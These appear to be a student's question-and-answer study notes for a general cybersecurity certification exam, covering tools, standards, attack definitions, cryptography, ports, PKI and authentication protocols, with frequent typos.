Scanless - run port scans from a different host
Dnsenum - Find host names and information about DNS server
Nessus - vulnerability scanning
Cuckoo - sandbox for malware

What applicaiton to use to capture packets on

the network?
Wireshark
TCPdump - gather information about the network
TCPreplay - we can send the information across the network which we have had
captured

Wha is command "dd" used?

create a bit-by-bit copy of an file

How to capture what is in the memory?

memdump

What is WinHex used for?

universal hexadecimal editor
edit diks, files, RAM
Disk cloning, secure wipe

What is FKT imager?

AccessData forensic drive imaging tool

What is autopsy used for?

To extract many different data types:
Downloaded files
Browser history and cache
Email messages
Databases

Where can we find how to respond to incident?

What standard?
NIST SP800-61

What is tabletop exercis?

We are not doing physical drill, but we are talking what we do if incident
happened.

What is part of diamond model of intrusion

analysis?
What standard is used as guidelines for
evidence collection and archiving?
RFC 3227

What are some control types?

Preventive - physically control access, door lock, firewall
Detective - mayb not prevent access, identifies and records (motion detector,
IDS)
Corrective - designaed to mitigate damage - IPS can block an attacker
Deterrent - may not directly prevent access - discourages an intrusion
Compensating - doesn't prevent, restored using other means - hot site, backup
power

What is GDPR?
General data protection regulation - people inside EU can decide where their
data goes

What is PCI DSS?

Payment card industry data security standard - protecting credit cards

What are some security frameworks

(standards) that you can appy?
Center for internet security
NIST RMF - National institute of standards and technology Risk management
framework (mandatory for US federal agencies and organizations that handle
federal data)
NIST CSF - Cybersecurity Framework - a voluntary commercial framework
ISO/IEC 27001 - Standard for an information security management system
ISO/IEC 27002 - Code of practice for information security controls
ISO/IEC 27701 - Privacy information management system
ISO 31000 - Internation standard of risk management practices
CSA - Cloud security alliance
What are some business policies techniques?
Job rotation, mandatory vacations, clean desk policy, dual control, seperation of
duties (single person doesn't have all of the details), background checks, social
media analysis, on-boarding, off-boarding

What are some risk assessments that company

needs to look for?
External threats
Internal threats
Legacy systems
Intellectual property (IP) theft
Software compliance

What is risk matrix?

Different types of audit risk models

Inherent risk - impact + linkelihood, risk that exists in the absence of controls
Residual riks - inherent risk + control effectiveness, risk that exists after controls
are considered
Risk appetite - the amount of risk an organization is willing to take
Data classification
Public - no restriction on viewing the data
Private - restricted access, may require a non-dislosure agreement
Sensitive - Intellectual property
Confidential - Very sensitive, must be approved to view
Critical - data should always be available
Financial information - customer financial details
Government data - may be protected by law
Customer - may include user-specific details

What is data minimization?

Minimal data collection - some information may not be required

What is the most common social engineering

attack related to computer security?
Phishing

What is watering hole attack?

watering hole attack involves the infecting of a target website with malware. In
some of the cases detected, the infection was constrained to a specific
geographical area. These are not simple attacks, yet they can be very effective
at delivering malware to specific groups of end users.

Difference between viruses, worms and trojans?

Trojan - Unlike a virus, which reproduces by attaching itself to other files or
programs, a trojan is a standalone program that must be copied and installed by
the user—it must be “brought inside” the system by an authorized user.

Worms act like a virus but also have the ability to travel without human action.
They do not need help to spread.
What is fileless virus?
piece of malware operates only in memory and never touching the filesystem

What are five types of rootkits?

Firmware, virtual, kernel, library and application level

How to prevent against SQL attacks?

input validation and stored procedures

What is DLL?
Dynamic-link library is a piece of code that can add functionality to a program
through the inclusion of library routines linked at runtime.

What can XML injection attack do?

XML that is maliciously altered can affect changes in configurations, changes in
data streams, changes in outputs—all from the injection.

What can be race conditions used for?

Race conditions can be used for privilege elevation and denial-of-service attacks.
Programmers can use reference counters, kernel locks, and thread
synchronization to prevent race conditions.

What is time of check/time of use attack?

A time of check/time of use attack is one that takes advantage of a separation
between the time a program checks a value and when it uses the value, allowing
an unauthorized manipulation that can affect the outcome of a process.
Against what types of attacks is input
validation good?
buffer overflow, reliance on untrusted inputs in a security decision, cross-site
scripting (XSS), cross-site request forgery (XSRF), path traversal, and incorrect
calculation of buffer size.

What is integer overflow?

An integer overflow is a programming error condition that occurs when a
program attempts to store a numeric value, which is an integer, in a variable
that is too small to hold it.

Difference between server-side request forgery

and cross-site request forgery
Server-side request forgery = These attacks exploit the trust relationship
between the server and the target, forcing the vulnerable application to perform
unauthorized actions.

Cross-site request forgery = It is performed against sites that have an

authenticated user and exploits the site’s trust in a previous authentication
event. Then, by tricking a user’s browser into sending an HTTP request to the
target site, the trust is exploited. Assume your bank allows you to log in and
perform financial transactions but does not validate the authentication for each
subsequent transaction. If user is logged in and has not closed their browser,
then an action in another browser tab could send a hidden request to the bank,
resulting in a transaction that appears to be authorized but in fact was not done
by the user.

What will cause resource exhaustion?

System to crashed - not be available

What is refactoring??
Refactoring is the process of restructuring existing computer code without
changing its external behavior.
Difference between Rogue access point and Evil
twin?
A rogue AP is an AP that is usually placed on an internal network either by
accident or for nefarious reasons. It is not administered by the network owner or
administrator. An evil twin is an AP that appears to be legitimate but isn’t and is
often used to eavesdrop on wireless communications.

Difference between bluesnarfing and blujacking

bluejacking is the sending of unauthorized data via Bluetooth, whereas
bluesnarfing is the unauthorized taking of data over a Bluetooth channel

What is Initialization Vector IV?

The initialization vector (IV) is used in wireless systems as the randomization
element at the beginning of a connection.

How sync attack works?

The victim will be flooded witll fake SYN request with non existing IP addresses.
Server will eventually time out connections, because it won't receive an ACK
packet, but if we send enough request before it times out, the service will be
denied

How ping of death attack works?

Ping packet is larger than 64 KB

How to block newer form of reflection attack

that uses CLDAP?
In this attack, the attacker asks for all the information on all accounts in the
Active Directory, pointing the information to the victim machine. Because the
attack is spoofed to appear to be coming from a legitimate requestor, the data is
sent to the victim machine.
UDP port 389 request will have a source IP from inside the network, yet it will
come from outside the network. Blocking this port on the inbound firewalls will
block this attack.

What is the goal of Advanced Persistent

Threats (APTs)
The tactics, tools, and procedures of APTs are focused on maintaining
administrative access to the target network and avoiding detection. Then, over
the long haul, the attacker can remove intellectual property and more from the
organization, typically undetected.

What is one of the hardest threats that security

professionals will have to address?
Insiders

What are Public/Private Information Sharing

Centers?
privately run, but government approved, industry-based cybersecurity.

real-time information can be shared between members.

Difference between dark web and deep web?

There is an area of the Internet called the deep web, which is the part of the
Internet that is not indexed by search engines. One example of the deep web is
material that requires you to log in to an account before it is exposed. Yes, the
deep web is readily accessible to a browser, but only with specific information,
such as a login to get there. This is different from the dark web.

What is short coming of academic journals?

Publishing a paper in an academic journal can take from a year to 18 months at
the minimum— after the work is done.
Academics deconstruct an issue to its base components to find an answer, but
whether that answer is applicable in real life is a totally different issue.

Advantages of local industry groups

First, they are a good source of practical information concerning threats, threat
actors, and what can be done to defend networks.

Second, they are a solid networking source of information that enables one to
get answers to questions that have been vetted by others in similar positions.

Difference between end of life and end of

support?
End of support - service is not provided anymore
End of life - equipmnet won't be manufactured anymore

What is data exfiltration?

exporting of stolen data from an enterprise

What is data loss?

Data loss is when an organization actually loses information

What is data breach?

Data breaches are the release of data to unauthorized parties.

What is financial risk associated with

vulnerabilities?
Regulatory fines and penalties
Loss of revenue due to downtime
What are direct third-party risks?
System integration
Supply chain
Vendor management

What is intelligence fusion?

Intelligence fusion is a process involving collecting and analyzing threat feeds
from both internal and external sources on a large scale.

What is advisories and bulltetins?

Advisories and bulletins are published sets of information from partners, such as
security vendors, industry groups, the government, information-sharing groups,
and other sources of “trusted” information. These are external sources of threat
feeds and need to be processed by security personnel to determine their
applicability and how to use them to improve defenses for the enterprise.

What is maneuvering?
Maneuvering is also a defensive tactic used by security professionals to disrupt
or prevent an attacker from moving lateraly as part of the attack chain.

They move deeper to the network in search of sensitive data and other high-
value assets.

Difference between false positives nad false

negatives
A false positive occurs when expected or normal behavior is wrongly identified as
malicious. The detection of a failed login followed by a successful login being
labeled as malicious, when the activity was caused by a user making a mistake
after recently changing their password, is an example of a false positive.

When an intrusion detection system (IDS) does not generate an alert from a
malware attack, this is a false negative.
What range is used for CVE?
score ranges from 0 to 10. As it increases, so does the severity of risk from the
vulnerability.

On which port does syslong server listen?

UDP 514 or TCP 6514

What is sentiment analysis?

Sentiment analysis is used to identify and track patterns in human emotions,
opinions, or attitudes that may be present in data.

What is downside of credential scanning?

The inability to scale across multiple systems

What are the advantages of penetration

testing?
Penetration tests are focused efforts to determine the effectiveness of the
security controls used to protect a system.

Difference between horizontal and vertical

privilige escalation?
In horizontal privilege escalation, the attacker expands their privileges by taking
over another account and misusing the legitimate privileges granted to the other
user.

In vertical privilege escalation, the attacker attempts to gain more permissions

or access with an existing account they have already compromised.
What is persistence?
Persistence is the ability to exist beyond a machine reboot or after
disconnection.

What is the difference between pivoting and

lateral movement?
The purpose of lateral movement is to go to where the data is, and pivoting is
one of the key methods of learning where to move next.

What is footprinting?
Footprinting is the first step in gaining active information on a network during
the reconnaissance process.

What is data sovereignty

data sovereignty laws apply to data that is stored in a specific country. For
example, if data is stored in the EU, then EU laws and privacy regulations apply
to how that data is stored and handled.

How can we protect data in processing?

We use protected memoiry schemes and address space layout randomization

2 types of TLS inspection

Server protection - inspects incoming connections to the servers

Client protection - inspects TLS outgoing connection initated by clients inside the
network.
What is hash?
special mathematical function that performs one-way encryption, which means
that once the algorithm is processed, there is no feasible way to use the
ciphertext to retrieve the plaintext that was used to generate it.

What is fake telemetry?

Fake telemetry is a deception technology used to make honeynets and
honeypots look real and appealing to would-be attackers.

What platform as a service focuses on?

security and scalability

What is NFV?
Network function virtualization - is an architecture that virutalizes network
services, such as routers, firewalls, load balancers.

What is serverless architecture?

serverless architecture is a way to develop and run applications and services
without owning and managing an infrastructure. Servers are still used, but they
are owned and managed “off-premises.”

What is transit gateway?

A transit gateway is a network connection that is used to interconnect virtual
private clouds (VPCs) and on-premises networks.

What is hypervisor?
A hypervisor is the interface between a virtual machine and the host machine
hardware. Hypervisors comprise the layer that enables virtualization.
What are 2 types of hypervisors in
virtualization?
Type 1 = run directly on the hardware - bare metal

Type 2 = run on top of host operating system

You are planning to move some applications to

the cloud, including your organization’s
accounting application, which is highly
customized and does not scale well. Which
cloud deployment model is best for this
application?
Infrastructure as a Service is appropriate for highly customized, poorly scaling
solutions that require specific resources to run.

What is platform as a service suitable for?

Platform as a Service is suitable for standard resources in use by many other
applications.

What is software as a service suitable for?

Delivering highly scalable, on-demand applications without installing endpoint
software.

Which cloud deployment model has the fewest

security controls?
Public

What needs to be the same between the

development and live environment?
The development platform does need to use the same OS type and version+
Development hardware does not have to be scalable, and it probably does not
need to be as responsive for given transactions

When is staging environment typically used?

when an organization has multiple production environments

What is dead code?

Dead code is code that, while it may be executed, obtains results that are never
used elsewhere in the program.

What are advatages of data being checked for

compliance on clients?
efficiency

What are advatages of data being checked for

compliance on servers?
It's more secure because:

1) client can change anything after the check

2) data can be altered while in transit or at an intermediary proxy

What are advantages of newer programming

langueages Java, C#, python over C or C ++?
garbage collection - routine to clean up memory that has been allocated in a
program but is no longer needed is provided automatically and wee don't need
to allocate free memery explicitly.

What is SDKs?
Software developers use packaged sets of software programs and tools called
SDKs to create apps for specific vender platforms.
What is OWASP?
The Open Web Application Security Project (OWASP) is a nonprofit foundation
dedicated to improving web-based application software security.

What is compiler?
Compilers take computer programs written in one language and convert them to
a set of codes that can run on a specific set of hardware

What is continuous monitoring?

Continuous monitoring is the term used to describe the technologies and
processes employed to enable rapid detection of compliance issues and security
risks.

What is continuous validation?

As code is changed in the DevOps process, the new code must be tested with
the existing codebase to ensure functionality and stability.

What is continuous integration?

continually updating and improving the production codebase.

rather than several large updates, with many integrated and many potentially
cross-purpose update elements, all squeezed into a single big package, a whole
series of smaller single-purpose integrations is run

What is continuous delivery?

automated release process that enables the delivery of updates when they are
complete, at any point of time, as opposed to a fixed release schedule.
What is continuous deployment?
Continuous deployment is continuous delivery on autopilot. It goes one step
further than continuous delivery in that the release is automatic.

What is difference in elasticity and scalability?

Scalability is done in design and development, not after delivery.

Scalability is the characteristic of a software system to process higher workloads

on its current resources (scale up) or on additional resources (scale out) without
interruption

What are DevOps continues tactics?

Continuous Monitoring
Continuous Validation
Continuous Integration
Continuous Delivery
Continuous Deployment

What kind of data will DLP solutions protect?

DLP solutions are designed to protect data in transit/motion, at rest, or in
processing from unauthorized use or exfiltration.

What is the difference between HOTP and

TOTP?
HMAC-based One-Time Password (HOTP)
Time-based One-Time Password (TOTP)

HOTP passwords can remain valid and active for an unknown time period. TOTP
passwords are considered more secure because they are valid for short amounts
of time and change often.
How push notification works?
Push notification authentication supports user authentication by pushing a
notification directly to an application on the user’s device. The user receives the
alert that an authentication attempt is taking place, and they can approve or
deny the access via the user interface on the application.

How can be smart cards used?

Many standard corporate-type laptops come with smart card readers installed,
and their use is integrated into the Windows user access system.

What is accaptable FAR (False acceptance

rate)?
0.01%

What is accaptable FRR (False rejection rate)

3%

What is false positive with biometrics

authentication?
A false positive occurs when a biometric is scanned and allows access to
someone who is not authorized.

How many drives do you need for different

RAID standards?
RAID 0 and RAID 1 both require a two-drive minimum. Both RAID 3 and RAID 5
have a three-drive minimum. RAID 10 (also called 1+0) requires four drives at
minimum
What is NIC teaming?
NIC teaming groups multiple NICs together to form a logical network device
called a bond. This provides for load balancing and fault tolerance.

What is snapshot when talking about backups?

A snapshot is a copy of a virtual machine at a specific point in time

What is difference between tape and disk?

A disk allows you to directly access specific elements randomly, whereas a tape
system stores everything in one long structure, requiring you to physical move
the tape if you wish to access an element halfway through the storage.

What is NAS?
Network attached storage (NAS) is the use of a network connection to attach
external storage to a machine. NAS is a simple extension of data storage to an
external system, and typically these devices do not transfer data fast enough for
regular operations.

Difference between NAS and SAN?

NAS is a single storage device that serves files over the network to a machine.
It’s a simple form of external storage. A SAN, on the other hand, is a network of
multiple devices designed to manage large and complex sets of data in real time
at processor speed.

Difference between high availability and fault

tolerance?
High availability refers to maintaining both data and services in an operational
state, even when a disrupting event occurs. Fault tolerance is a design objective
to achieve high availability should a fault occur.
Difference between scalability and elasticity?
Elasticity and scalability seem to be the same thing, but they are different.
Elasticity is related to dynamically scaling a system with workload (scaling out),
whereas scalability is a design element that enables a system both to scale up to
more capable hardware and to scale out to more instances.

What is diversity in cyber security?

Diversity is about having multiple different sets of controls to provide for risk
mitigation. Diversity should be practiced in all aspects and used to enhance
security

What is SCADA?
supervisory control and data acquisition - can control manufacturing plants,
traffic lights, refineries, energy networks, water plants, building automation and
environmental controls, and a host of other systems.

Which part of industries need strick network

segmentation?
Manufacturing
Energy needs a unique physical security aspect

What can be categorized as specialized systems

in IoT?
medical devices, vehicles, aircrafts and smart meters

What is specific for medical systems?

Medical devices are manufactured under strict regulatory guidelines that are
designed for static systems that do not need patching, updating, or changes
What standard do vehicle systems use?
CAN = controller area network

Are HVAC systems accessible from internet?

Yes

What OS is used in real time operating

systems?
They have specificaly crafter OS as Windows and Linux are multithreaded which
adds overhead.

What smart devices can be accessed via

Internet?
VoIP, HVAC, drones, multifunction printers

What is advantage of narrow band radio

communication.
It's slow but the distance is big - used for a large geographic area

What communication technology carries only

single channel?
Baseband radio

What are constrains of embedded systems?

limitations on power, compute capacity, network throughput and bandwidth,
cryptography, and cost.
Which small devices are good for compute
capabilities?
Microcontrollers
Field programmable gate arrays = FPGAs
Application - specific integrated circuits = ASICs (used in modern self - driving
cars)

What is implied trust?

Implied trust, by definition, is trust that has not been specifically set up but yet
exists.

What are bollards used for?

Bollards are sturdy posts often made of concrete or galvanized or stainless steel.
They are used to protect entry ways and prevent unauthorized entry or vehicle
ramming attacks.

What is advantage of motion recognition?

In the dark camera might not see you, but motion recognition might detect you
based on temperature signiture

What should be done to protect IP based

security cameras?
Place them on seperate network only accesible to security personal

How robot centries work?

They walk around the space and if they notice unauthorized person they will
send notice to personal.
What is USB data blocker?
It will block 2 out of 4 conductors and only use those for power. This way data
can't be transmitted.

3 types of fire detections

Smoke detectors - can detect smoke
Temperature detectors - can be false positive
Flame activated detector - most precise

What is used as physical detection?

Cameras, IR detection, motion detection, logs

What is EMI?
Electormagnetic interference - disturbance that affects an electrical circuit

What is pulping?
Pulping is a process by which paper fibers are suspended in a liquid and
recombined into new paper.

What is pulverizing?
Pulverizing is a physical process of destruction using excessive physical force to
break an item into unusable pieces. Pulverizers are used on items like hard disk
drives, destroying the platters in a manner that they cannot be reconstructed.

What is degaussing?
magnetic storage devices (that is, magnetic tape and hard drives) can be
destroyed magnetically
What provides encryption?
Confidentiality

What provides digital signature?

nonrepudiation

What is key stretching?

Key stretching is a mechanism that takes what would be weak keys and
“stretches” them to make the system more secure against brute-force attacks.

What is entropy?
Entropy is an important term in cryptography; it refers to the level of
randomness

Where is nonce used?

A nonce is a number used only once, and is similar to a salt, or an IV. However,
because it is only used once, if it is needed again, a different value is used.
Nonces provide random nondeterministic entropy into cryptographic functions
and are commonly used in stream ciphers to break stateful properties when the
key is reused.

What is authenticated encryption with

associated data?
Authenticated encryption with associated data (AEAD) is a form of encryption
designed to provide both confidentiality and authenticity services. A wide range
of authenticated modes is available for developers, including GCM, OCB, and
EAX.
Common algorithms for symmetric encryption
AES, 3DES, RCA, IDEA

Common algorithms for asymmetric encryption

DSA, RSA, El Gamal, ECC, Diffie-Hellman

What is the most common standard for

steganography with pictures?
LSB encoding method of encoding information into an image while altering the
actual visual image as little as possible

What kind of cryptographic option is the best

for low-latency operations?
Stream ciphers

What provides message authnetication code?

(MAC)
supported by hash functions are an example of cryptographic services
supporting integrity.

What is gaining favor instead of EAS?

ChaCha20 because it's faster

Which algorithms in cryptography can suffer

from weak keys?
DES< RC4, IDEA, Blowfish, GMAC
What algorithms standards in cryptography are
weak?
MD5 = because of collisions
SHA 1, 256 = suspect to forced collisions
AES and ChaCha20 are efficient and provide better performence

1 . If you need to perform operations such as

addition on encrypted elements, what type of
encryption scheme would you use?
Homomorphic

To prevent the loss of a single message due to

accidental decryption from affecting other
encrypted messages, which of the following
properties is needed?
Perfect forward secrecy

Given a large quantity of data in the form of a

streaming video file, what is the best type of
encryption method to protect the content from
unauthorized live viewing?
Stream cipher

What is DNSSEC?
DNSSEC validates DNS data, thus providing integrity, but it does not provide
controls for availability or confidentiality.

What is S/MIME and what it provides?

Remember that S/MIME is the standard for e-mail encryption. It provides
authentication, message integrity, and nonrepudiation in e-mails
What is Support for Confidentiality
Protecting data from unauthorized reading is the definition of confidentiality.

What is Support for Integrity

Integrity can demonstrate that data has not been altered.

What is Support for Nonrepudiation

Nonrepudiation is a property that deals with the ability to verify that a message
has been sent and received so that the sender (or receiver) cannot refute
sending (or receiving) the informatio

Which port uses LDAPS?

LDAPS communication occurs over port TCP 636. LDAPS communication to a
global catalog server occurs over TCP 3269. When connecting to port 636 or
3269, SSL/TLS is negotiated before any LDAP traffic is exchanged.

What port uses FTPS?

TCP port 989 (data connection port) and port 990 (control connection port).

What ports are used for POP3 and IMAP?

ports 110 for POP3 and 143 for IMAP.
secure POP3 utilizes TCP port 995 and secure IMAP4 uses TCP port 993

What ports are used by SMTP?

SMTP between servers is TCP port 25, but when clients are involved, it is TCP
port 587 or, if encrypted, TCP port 465.
What is heuristic scanning?
Heuristic scanning is a method of detecting potentially malicious or “virus-like”
behavior by examining what a program or section of code does. Anything that is
“suspicious” or potentially “malicious” is closely examined to determine whether
or not it is a threat to the system.

What is EDR?
Endpoint detection and response = includes antivirus, anti-malware, software
patching, firewall, and DLP solutions.

Difference between HIDS and HIPS?

Host based intrusion prevention system - HIPS
Host based intrusion detection system - HIDS

Remember that HIDS can only detect malicious activity and send alerts. HIPS, on
the other hand, can detect and prevent attacks.

Difference between static, manual and dynamic

code analysis
Static analysis - usually performed by machine - automated (without being
executed)
Manual code review - done by programmer or code author that explains others
eeach line
Dynamic code analysis - performed while the software is executed, either on
target system or an emulated system

What is SED, FDE and Opal?

methods of implementing encryption on hard drives.
Fuzz testing works best in which testing
environments?
Fuzz testing works well in known environment, unknown environment, and
partially known environment testing, as it can be performed without knowledge
of the specifics of the application under test

You have a series of web servers that you wish

to harden. Which is the best solution for this
case?
An allow list

Difference between forward proxy na reverse

proxy
A forward proxy is Internet-facing and acts on behalf of the client. It protects the
client. A reverse proxy is internally facing and acts on behalf of the server, which
it protects.

How behavior model works?

what should happen on the network and is considered “normal” or “acceptable”
traffic. Behavior that does not fit into the “normal” activity categories or patterns
is considered suspicious or malicious.

How heuristic model works?

The heuristic model uses artificial intelligence (AI) to detect intrusions and
malicious traffic. This is typically implemented through algorithms that help an
IDS decide whether or not a traffic pattern is malicious.

How anomaly based detection works?

Anomaly detection identifies deviations from normal behavior.
What is network security monitoring?
Network security monitoring (NSM) is the process of collecting and analyzing
network data to detect unauthorized activity.

NSM is not a way to prevent intrusions, but when deployed inside a network, it
can detect where other defenses have failed.

What is extensive authentication protocol -

EAP?
(EAP) is a protocol for wireless networks that expands on authentication methods
used by the Point-to-Point Protocol (PPP).

EAP can support multiple authentication mechanisms, including tokens, smart

cards, certificates, one-time passwords, and public key encryption
authentication.

What is PEAP?
Protected Extensible Authentication Protocol - encapsulating it with Transport
Layer Security (TLS)

Difference between PEAP and EAP-TLS

EAP-TLS for mutual authentication requires client and server certificates. PEAP
and EAP-TTLS eliminate the requirement to deploy or use client certificates.

What is EAP-FAST?
offers a lightweight tunneling protocol to enable authentication

What PSK stands for?

Pre-shared key
What authentication is used in enterprise mode
with wireless?
802.1x and a radius server

What is open system authentication in

wireless?
Open System authentication is not truly authentication; instead, it is merely a
sharing of a secret key based on the SSID

What is captive portal used for?

Captive portals are common in coffee shops, airports, hotels, and stores. The
user accepts the offered conditions, views, and advertisement, provides an e-
mail address or other authentication requirement, and is granted access to the
portal. Used in wireless

What is the difference between heat map and

site survey?
A site survey is a process for determining Wi-Fi signal strengths; the heat map is
one of the outcomes and is part of the survey.

What is unique about EAP-TTLS

It is easier to set up than other EAP schemes.

Which wireless protocol allows the passing of

legacy authentication protocols such as PAP,
CHAP, and MS-CHAP?
EAP-TTLS
What is advantage and disadvantage of cellular
network?
. One of the strengths of cellular is that robust nationwide networks have been
deployed, making strong signals available virtually anywhere with reasonable
population density.

The corresponding weakness is that gaps in cellular service still exist in remote
areas.

What is the disadvantage of Infrared?

It's slow compared to other wireless technologies

What should provide mobile device

management?
• Device locking with a strong password
• Encryption of data on the device
• Device locking automatically after a certain period of inactivity
• The capability to remotely lock the device if it is lost or stolen
• The capability to wipe the device automatically after a certain number of
failed login attempts
• The capability to remotely wipe the device if it is lost or stolen

What is the difference between geofencing and

geolocation?
Geofencing is the use of the Global Positioning System (GPS) and/or radio
frequency identification (RFID) technology to create a virtual fence around a
particular location and detect when mobile devices cross the fence. This enables
devices to be recognized by others, based on location, and have actions taken.

Geolocation - track movement and location of the mobile device. Can be used to
assist in the recovery of lost devices.
Difference between tethering and hotspot?
Tethering involves the connection of a device to a mobile device to gain network
connectivity. A hotspot can be tethered if the actual device is mobile, but if the
device is fixed, it is not tethering.

What can be zones used to in the cloud?

zones can be used for replication and provide load balancing as well as high
availability

What is VPC used for in the cloud?

virtual private cloud endpoint provides a means to connect a VPC to other
resources without going out over the Internet. In other words, you don’t need
additional VPN connection technologies or even an Internet gateway.

What is CASB in relation to cloud?

cloud access security broker is a security policy enforcement point that is placed
between cloud service consumers and cloud service providers to manage
enterprise security policies as cloud-based resources are accessed.

What are SSH keys usually used for?

primarily used for automated processes and services

What is important when creating user ID?s?

Having unique, nonshared user IDs for all users of a system is important when it
comes time to investigate access control issues.

What can be used together to manage

password history?
• Enforce password history Tells the system how many passwords to
remember and does not allow a user to reuse an old password in that list
• Maximum password age Specifies the maximum number of days a password
may be used before it must be changed
• Minimum password age Specifies the minimum number of days a password
must be used before it can be changed again

Where you can manage passwords in Windows?

Local group policies

What are access policies?

covering password use, password length, expiration, and lockout, to more
complex issues such as account expiration, recovery, and disablement, these
directives provide the guidance for security personnel to manage access
systems.

Which type of account comes with the greatest

risk?
shared account

What CHAP relies on?

his mechanism relies on a shared secret between the two entities so that the
correct values can be calculated.

CHAP uses PPP, which supports which three

functions?
Encapsulate datagrams across serial links
Establish, configure, and test links using LCP (Link Control Protocol)
Establish and configure different network protocols using NCP (Network Control
Protocol)
What is the disadvantage of PAP?
PAP is a cleartext authentication protocol and hence is subject to interception.
CHAP uses a challenge/response handshake protocol to secure the channel.

Which port is used for RADIUS?

UDP 1812 fo authorization and 1813 for accounting functions

Which protocol is used by TACACS?

TCP 49

What is the difference between OAuth and

OpenID?
OpenID is used for authentication, whereas OAuth is used for authorization.

How Kerberos works?

Kerberos securely passes a symmetric key over an insecure network using the
Needham-Schroeder symmetric key protocol.

What is kerberos build arouond?

Kerberos is built around the idea of a trusted third party, termed a key
distribution center (KDC) , which consists of two logically separate parts: an
authentication server (AS) and a ticket-granting server (TGS).

What contains Kerberos server?

The Kerberos server contains user IDs and hashed passwords for all users that
will have authorizations to realm services.

Steps involved in Kerberos authentication?

1. The user presents credentials and requests a ticket from the Key Distribution
Server (KDS).
2. The KDS verifies credentials and issues a TGT. (Ticket granted ticket)
3. The user presents a TGT and request for service to the KDS.
4. The KDS verifies authorization and issues a client-to-server ticket.
5. The user presents a request and a client-to-server ticket to the desired
service.
6. If the client-to-server ticket is valid, service is granted to the client.

What is authentication?
authentication deals with verifying the identity of a subject

What is ABAC?
Attribute-based access control (ABAC) - form of access control based on
attributes. These attributes can be in a wide variety of forms, such as user
attributes, resource or object attributes, and environmental attributes

What is rule-based access control?

series of rules is contained in the ACL, and the determination of whether to grant
access will be made based on these rules. An example of such a rule is one that
states that no employee may have access to the payroll file after hours or on
weekends

Users are not able to change access control and rely on administrators

What are some common information

classification in MAC?
mandatory access control (MAC) - Individuals can't change access control
Common information classifications include High, Medium, Low, Confidential,
Private, and Public.
What is Discretionary access control (DAC)?
The controls are discretionary in the sense that a subject with a certain access
permission is capable of passing that permission (perhaps indirectly) on to any
other subject.

In systems that employ DACs, the owner of an object can decide which other
subjects can have access to the object and what specific access they can have

Which 2 authentication systems are terms

originally used in military?
DAC, MAC

What is the difference between DAC and MAC?

MAC is associated with multilevel security labels such as Top Secret and Secret,
whereas DAC uses ACLs.

When can be conditional access very useful?

Conditional access can be very useful when an entity has a wide array of
different systems with differing access needs.

Which type of file standard is bad for security?

FAT32, but NTFS is good.

What permissions can be apply to user or group

to control folder and files in Windows?
• Full Control A user/group can change permissions on the folder/file, take
ownership if someone else owns the folder/file, delete subfolders and files, and
perform actions permitted by all other NTFS folder permissions.
• Modify A user/group can view and modify files/folders and their properties,
can delete and add files/folders, and can delete properties from or add properties
to a file/folder.
• Read & Execute A user/group can view the file/folder and can execute scripts
and executables, but they cannot make any changes (files/folders are read-only).
• List Folder Contents A user/group can list only what is inside the folder
(applies to folders only).
• Read A user/group can view the contents of the file/folder and the file/folder
properties.
• Write A user/group can write to the file or folder.

What file permissions consist of in UNIX

operating systems?
• Owner permissions (read, write, and execute) The owner of the file
• Group permissions (read, write, and execute) The group to which the
owner of the file belongs
• World permissions (read, write, and execute) Anyone else who is not the
owner and does not belong to the group to which the owner of the file belongs

Which authentication scheme is the best for

users, who have not previously established
their identity?
Knowledge-based authentication

How can we know that public key comes from

the owner and not someone else?
We use RA. A registration authority (RA) verifies digital certificate requests and
forwards them to a certificate authority (CA). The CA is a trusted organization
that validates and issues digital certificates.

What is Nonrepudiation?
Assurance that the sender of information is provided with proof of
delivery and the recipient is provided with proof of the sender's identity, so
neither can later deny having processed the information.
What is certificate revocation list used for?
The certificate revocation list is an essential item to ensure a certificate is still
valid. CAs post CRLs in publicly available directories to permit automated
checking of certificates against the list before certificate use by a client. A user
should never trust a certificate that has not been checked against the
appropriate CRL.

How can we check if CRL wasn't edited by

fraudulent person?
The mechanism used to protect the integrity of a CRL is a digital signature

The CA’s revocation service creates a digital signature for the CRL. To validate a
certificate, the user accesses the directory where the CRL is posted, downloads
the list, and verifies the CA’s digital signature to ensure that the proper authority
signed the list and to ensure that the list was not modified in an unauthorized
manner.

What is delta CRLs?

We push down the full CRL, and after that initial load, the following CRLs pushed
down to the users are delta CRLs contain only the changes to the original or base
CRL

How to check if certificate was revoked?

Certificate revocation checks are done either by examining the CRL or using
OCSP to see if a certificate has been revoked.

What is certificate signing request (CSR)?

A certificate signing request (CSR) is the actual request to a CA containing a
public key and the requisite information needed to generate a certificate. The
CSR contains all the identifying information that is to be bound to the key by the
certificate-generation process.
What is FQDN?
Fully qualified domain name

What are wildcard certificates?

Wildcard certificates include an asterisk and period before the domain name.

*.example.com would be valid for one.example.com as well as two.example.com

What can be end-entity certificate?

Email certificate
User certificate

What decides if we trust self signed (root)

certificate?
What determines whether or not a system trusts a root certificate is whether or
not the root certificate is in the system’s store of trusted certificates.

What is computer certificate used for?

For computer connecting to the network

Which format for certificate is best if you need

to transmit multiple certificates?
PEM encoding can carry multiple certificates, whereas DER can only carry a
single certificate.

Which certificate format is used by web

servers?
The file extension .cer is an SSL certificate file format used by web servers
How many certificates will Debbie check if she
gets message from Sam?

1) She will check Sam's certificate

2) She will check Leaf D certificate
3) She will check intermediate B certificate
4) She doesn't have to validate Root CA, because she already has trust with it

Debbie validates the certificate by verifying its digital signature

Where is hierarchical model for CAs used?
Enterprise, but many companies cannot use this type of trust model because
different departments or offices require their own trust anchors

This hierarchical model might not be possible when two or more companies need
to communicate with each other

How peer to peer trust model for CAs works?

In a peer-to-peer trust model, one CA is not subordinate to another CA.
It doesn't scale well

How hybrid model in CAs works?

Combination of hierarchical model for internal and peer to peer with partners
bridge CA can control the cross-certification procedures.
What is key escrow?
Key escrow is a system by which your private key is kept both by you and by a
third party.

What is CRL?
Certificate revocation list

Why is pinning more important on mobile

devices?
It allows caching of a known good certificate when roaming to low-trust
networks.
What is tracert/traceroute used for?
The tracert and traceroute commands display the route a packet takes to a
destination, recording the number of hops along the way. These are excellent
tools to use to see where a packet may get hung up during transmission.

What means nonauthoritative answer with DNS

lookup?
typically means the result is from a cache as opposed to a server that has an
authoritative

Difference between pathping, ping and

traceroute?
Pathping will first display your path results as if you were using tracert or
traceroute. Pathping then calculates loss information

In pathing there will be % and in tracert not

What is netstat command used for?
The netstat command is useful for viewing all listening ports on a computer and
determining which connections are active.

4 different arp messages

• ARP request “Who has this IP address?”
• ARP reply “I have that IP address; my MAC address is…”
